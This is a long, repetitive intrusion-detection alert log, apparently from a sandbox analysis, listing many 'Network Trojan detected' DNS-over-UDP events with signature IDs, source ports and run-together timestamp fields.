                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.855654532829498 09/01/22-00:03:19.297074
                    SID:2829498
                    Source Port:55654
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.854288532829500 09/01/22-00:03:33.756470
                    SID:2829500
                    Source Port:54288
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.865515532829500 09/01/22-00:02:19.472414
                    SID:2829500
                    Source Port:65515
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.859767532026737 09/01/22-00:03:34.075907
                    SID:2026737
                    Source Port:59767
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.860649532829498 09/01/22-00:03:25.341169
                    SID:2829498
                    Source Port:60649
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.853628532026737 09/01/22-00:02:01.851234
                    SID:2026737
                    Source Port:53628
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.864970532829500 09/01/22-00:02:44.867082
                    SID:2829500
                    Source Port:64970
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.862434532026737 09/01/22-00:02:57.492445
                    SID:2026737
                    Source Port:62434
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.859583532026737 09/01/22-00:02:11.706174
                    SID:2026737
                    Source Port:59583
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.850232532026737 09/01/22-00:02:54.777871
                    SID:2026737
                    Source Port:50232
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.852959532829500 09/01/22-00:01:25.367458
                    SID:2829500
                    Source Port:52959
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.850787532026737 09/01/22-00:02:43.367194
                    SID:2026737
                    Source Port:50787
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.858123532829498 09/01/22-00:02:27.969558
                    SID:2829498
                    Source Port:58123
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.860423532829498 09/01/22-00:03:32.424188
                    SID:2829498
                    Source Port:60423
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.865201532829500 09/01/22-00:02:04.842170
                    SID:2829500
                    Source Port:65201
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.854157532829498 09/01/22-00:02:39.751533
                    SID:2829498
                    Source Port:54157
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.865112532829500 09/01/22-00:01:46.974641
                    SID:2829500
                    Source Port:65112
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.859830532829500 09/01/22-00:02:55.974495
                    SID:2829500
                    Source Port:59830
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.855460532829498 09/01/22-00:03:07.301197
                    SID:2829498
                    Source Port:55460
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.853307532829500 09/01/22-00:01:54.875889
                    SID:2829500
                    Source Port:53307
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.851595532026737 09/01/22-00:03:26.929732
                    SID:2026737
                    Source Port:51595
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.856044532829500 09/01/22-00:01:38.460693
                    SID:2829500
                    Source Port:56044
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.857828532829500 09/01/22-00:03:23.000023
                    SID:2829500
                    Source Port:57828
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.864606532829500 09/01/22-00:02:41.903320
                    SID:2829500
                    Source Port:64606
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.853273532829498 09/01/22-00:02:55.304130
                    SID:2829498
                    Source Port:53273
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.856047532829500 09/01/22-00:01:38.529181
                    SID:2829500
                    Source Port:56047
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.850626532026737 09/01/22-00:03:18.717464
                    SID:2026737
                    Source Port:50626
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.863691532829498 09/01/22-00:03:21.687512
                    SID:2829498
                    Source Port:63691
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.859825532026737 09/01/22-00:02:20.014612
                    SID:2026737
                    Source Port:59825
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.855954532829500 09/01/22-00:03:25.612012
                    SID:2829500
                    Source Port:55954
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.862428532026737 09/01/22-00:03:13.188986
                    SID:2026737
                    Source Port:62428
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.861419532829498 09/01/22-00:02:03.004767
                    SID:2829498
                    Source Port:61419
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.860474532829498 09/01/22-00:02:47.119975
                    SID:2829498
                    Source Port:60474
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.864274532829498 09/01/22-00:03:00.057400
                    SID:2829498
                    Source Port:64274
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.853853532026737 09/01/22-00:01:50.543832
                    SID:2026737
                    Source Port:53853
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.855248532829498 09/01/22-00:03:03.486266
                    SID:2829498
                    Source Port:55248
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.853432532829498 09/01/22-00:02:18.428585
                    SID:2829498
                    Source Port:53432
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.853849532829498 09/01/22-00:01:59.483040
                    SID:2829498
                    Source Port:53849
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.859586532026737 09/01/22-00:02:11.767488
                    SID:2026737
                    Source Port:59586
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.860477532829498 09/01/22-00:02:47.180255
                    SID:2829498
                    Source Port:60477
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.852743532026737 09/01/22-00:03:23.998658
                    SID:2026737
                    Source Port:52743
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.849170532829500 09/01/22-00:02:32.467435
                    SID:2829500
                    Source Port:49170
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.865325532026737 09/01/22-00:01:43.903174
                    SID:2026737
                    Source Port:65325
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.857575532829498 09/01/22-00:01:53.271847
                    SID:2829498
                    Source Port:57575
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.849879532829500 09/01/22-00:02:36.072251
                    SID:2829500
                    Source Port:49879
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.859640532026737 09/01/22-00:01:39.971866
                    SID:2026737
                    Source Port:59640
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.865109532829500 09/01/22-00:01:46.914019
                    SID:2829500
                    Source Port:65109
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.863450532829498 09/01/22-00:02:35.496675
                    SID:2829498
                    Source Port:63450
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.860646532829498 09/01/22-00:03:25.281760
                    SID:2829498
                    Source Port:60646
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.854285532829500 09/01/22-00:03:33.695070
                    SID:2829500
                    Source Port:54285
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.858915532829500 09/01/22-00:03:18.040653
                    SID:2829500
                    Source Port:58915
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.864974532829500 09/01/22-00:03:05.683602
                    SID:2829500
                    Source Port:64974
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.858482532829500 09/01/22-00:03:29.362481
                    SID:2829500
                    Source Port:58482
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.864125532829498 09/01/22-00:02:44.347197
                    SID:2829498
                    Source Port:64125
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.859437532026737 09/01/22-00:01:57.658266
                    SID:2026737
                    Source Port:59437
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.857137532829498 09/01/22-00:01:34.192981
                    SID:2829498
                    Source Port:57137
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.860819532829500 09/01/22-00:03:08.807703
                    SID:2829500
                    Source Port:60819
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.864598532829498 09/01/22-00:02:22.069673
                    SID:2829498
                    Source Port:64598
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.865388532026737 09/01/22-00:02:38.683294
                    SID:2026737
                    Source Port:65388
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.852460532026737 09/01/22-00:03:02.922606
                    SID:2026737
                    Source Port:52460
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.861361532829498 09/01/22-00:03:28.363595
                    SID:2829498
                    Source Port:61361
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.865464532829500 09/01/22-00:03:37.331573
                    SID:2829500
                    Source Port:65464
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.863566532026737 09/01/22-00:02:17.069143
                    SID:2026737
                    Source Port:63566
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.849203532026737 09/01/22-00:02:46.656883
                    SID:2026737
                    Source Port:49203
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.864972532829500 09/01/22-00:03:05.639386
                    SID:2829500
                    Source Port:64972
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.853051532829498 09/01/22-00:02:15.015452
                    SID:2829498
                    Source Port:53051
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.851995532026737 09/01/22-00:02:26.294405
                    SID:2026737
                    Source Port:51995
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.851107532829500 09/01/22-00:03:01.623107
                    SID:2829500
                    Source Port:51107
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.864969532829500 09/01/22-00:02:44.846895
                    SID:2829500
                    Source Port:64969
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.852113532026737 09/01/22-00:03:20.304409
                    SID:2026737
                    Source Port:52113
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.858121532829498 09/01/22-00:02:27.883460
                    SID:2829498
                    Source Port:58121
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.857707532829500 09/01/22-00:01:42.707644
                    SID:2829500
                    Source Port:57707
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.861420532829498 09/01/22-00:02:03.023139
                    SID:2829498
                    Source Port:61420
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.860772532829498 09/01/22-00:01:45.515640
                    SID:2829498
                    Source Port:60772
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.859379532829500 09/01/22-00:02:48.360270
                    SID:2829500
                    Source Port:59379
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.860420532829498 09/01/22-00:03:32.361100
                    SID:2829498
                    Source Port:60420
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.858306532026737 09/01/22-00:02:34.518930
                    SID:2026737
                    Source Port:58306
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.857136532829498 09/01/22-00:01:34.170593
                    SID:2829498
                    Source Port:57136
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.863692532829498 09/01/22-00:03:21.709351
                    SID:2829498
                    Source Port:63692
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.851110532829500 09/01/22-00:03:01.687030
                    SID:2829500
                    Source Port:51110
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.855651532829498 09/01/22-00:03:19.239137
                    SID:2829498
                    Source Port:55651
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.861187532829498 09/01/22-00:02:52.669551
                    SID:2829498
                    Source Port:61187
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.850789532026737 09/01/22-00:02:43.405655
                    SID:2026737
                    Source Port:50789
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.864126532829498 09/01/22-00:02:44.367092
                    SID:2829498
                    Source Port:64126
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.856045532829500 09/01/22-00:01:38.479108
                    SID:2829500
                    Source Port:56045
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.849876532829500 09/01/22-00:02:36.017097
                    SID:2829500
                    Source Port:49876
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.853430532829498 09/01/22-00:02:18.389778
                    SID:2829498
                    Source Port:53430
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.864275532829498 09/01/22-00:03:00.076893
                    SID:2829498
                    Source Port:64275
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.852746532026737 09/01/22-00:03:24.060420
                    SID:2026737
                    Source Port:52746
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.865199532829500 09/01/22-00:02:04.790776
                    SID:2829500
                    Source Port:65199
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.855643532829498 09/01/22-00:01:41.349610
                    SID:2829498
                    Source Port:55643
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.865322532026737 09/01/22-00:01:43.838373
                    SID:2026737
                    Source Port:65322
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.857389532829500 09/01/22-00:02:53.228134
                    SID:2829500
                    Source Port:57389
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.852457532026737 09/01/22-00:03:02.822494
                    SID:2026737
                    Source Port:52457
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.859766532026737 09/01/22-00:03:34.053456
                    SID:2026737
                    Source Port:59766
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.850094532026737 09/01/22-00:03:38.722516
                    SID:2026737
                    Source Port:50094
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.863689532829498 09/01/22-00:03:21.642301
                    SID:2829498
                    Source Port:63689
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.864828532829500 09/01/22-00:02:24.814616
                    SID:2829500
                    Source Port:64828
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.862427532026737 09/01/22-00:03:13.168037
                    SID:2026737
                    Source Port:62427
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.858485532829500 09/01/22-00:03:30.012594
                    SID:2829500
                    Source Port:58485
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.860586532026737 09/01/22-00:01:27.526553
                    SID:2026737
                    Source Port:60586
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.860648532829498 09/01/22-00:03:25.320562
                    SID:2829498
                    Source Port:60648
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.850231532026737 09/01/22-00:02:54.755739
                    SID:2026737
                    Source Port:50231
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.859831532829500 09/01/22-00:02:55.995864
                    SID:2829500
                    Source Port:59831
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.857138532829498 09/01/22-00:01:34.214783
                    SID:2829498
                    Source Port:57138
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.865465532829500 09/01/22-00:03:37.351949
                    SID:2829500
                    Source Port:65465
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.859641532026737 09/01/22-00:01:39.990388
                    SID:2026737
                    Source Port:59641
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.859638532026737 09/01/22-00:01:39.931325
                    SID:2026737
                    Source Port:59638
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.854435532829498 09/01/22-00:03:36.023381
                    SID:2829498
                    Source Port:54435
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.860818532829500 09/01/22-00:03:08.745097
                    SID:2829500
                    Source Port:60818
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.857576532829498 09/01/22-00:01:53.290249
                    SID:2829498
                    Source Port:57576
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.849171532829500 09/01/22-00:02:32.489443
                    SID:2829500
                    Source Port:49171
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.851144532829498 09/01/22-00:01:24.145242
                    SID:2829498
                    Source Port:51144
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.852115532026737 09/01/22-00:03:20.348262
                    SID:2026737
                    Source Port:52115
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.856620532026737 09/01/22-00:02:49.146584
                    SID:2026737
                    Source Port:56620
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.851109532829500 09/01/22-00:03:01.665772
                    SID:2829500
                    Source Port:51109
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.864379532829500 09/01/22-00:03:19.992460
                    SID:2829500
                    Source Port:64379
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.864599532829498 09/01/22-00:02:22.089885
                    SID:2829498
                    Source Port:64599
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.860821532829500 09/01/22-00:03:08.846909
                    SID:2829500
                    Source Port:60821
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.849205532026737 09/01/22-00:02:46.696702
                    SID:2026737
                    Source Port:49205
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.849878532829500 09/01/22-00:02:36.053729
                    SID:2829500
                    Source Port:49878
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.853846532829498 09/01/22-00:01:59.423880
                    SID:2829498
                    Source Port:53846
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.860091532829500 09/01/22-00:02:16.509694
                    SID:2829500
                    Source Port:60091
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.859377532829500 09/01/22-00:02:48.283085
                    SID:2829500
                    Source Port:59377
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.859824532026737 09/01/22-00:02:19.994370
                    SID:2026737
                    Source Port:59824
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.864607532829500 09/01/22-00:02:41.921899
                    SID:2829500
                    Source Port:64607
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.855249532829498 09/01/22-00:03:03.506251
                    SID:2829498
                    Source Port:55249
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.864380532829500 09/01/22-00:03:20.011368
                    SID:2829500
                    Source Port:64380
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.850092532026737 09/01/22-00:03:38.678470
                    SID:2026737
                    Source Port:50092
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.853272532829498 09/01/22-00:02:55.282821
                    SID:2829498
                    Source Port:53272
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.857392532829500 09/01/22-00:02:53.296910
                    SID:2829500
                    Source Port:57392
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.858916532829500 09/01/22-00:03:18.060823
                    SID:2829500
                    Source Port:58916
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.853053532829498 09/01/22-00:02:15.057233
                    SID:2829498
                    Source Port:53053
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.864826532829500 09/01/22-00:02:24.770961
                    SID:2829500
                    Source Port:64826
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.853625532026737 09/01/22-00:02:01.788642
                    SID:2026737
                    Source Port:53625
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.851596532026737 09/01/22-00:03:26.954769
                    SID:2026737
                    Source Port:51596
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.862435532026737 09/01/22-00:02:57.512287
                    SID:2026737
                    Source Port:62435
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.853852532026737 09/01/22-00:01:50.489647
                    SID:2026737
                    Source Port:53852
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.862429532026737 09/01/22-00:03:13.209944
                    SID:2026737
                    Source Port:62429
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.860584532026737 09/01/22-00:01:27.482735
                    SID:2026737
                    Source Port:60584
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.864124532829498 09/01/22-00:02:44.327136
                    SID:2829498
                    Source Port:64124
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.861189532829498 09/01/22-00:02:52.764321
                    SID:2829498
                    Source Port:61189
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.849168532829500 09/01/22-00:02:32.423642
                    SID:2829500
                    Source Port:49168
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.863451532829498 09/01/22-00:02:35.516825
                    SID:2829498
                    Source Port:63451
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.850625532026737 09/01/22-00:03:18.697259
                    SID:2026737
                    Source Port:50625
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.854286532829500 09/01/22-00:03:33.715891
                    SID:2829500
                    Source Port:54286
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.860769532829498 09/01/22-00:01:45.451637
                    SID:2829498
                    Source Port:60769
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.852744532026737 09/01/22-00:03:24.019183
                    SID:2026737
                    Source Port:52744
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.855641532829498 09/01/22-00:01:41.302395
                    SID:2829498
                    Source Port:55641
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.853469532829500 09/01/22-00:02:00.624524
                    SID:2829500
                    Source Port:53469
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.860770532829498 09/01/22-00:01:45.473540
                    SID:2829498
                    Source Port:60770
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
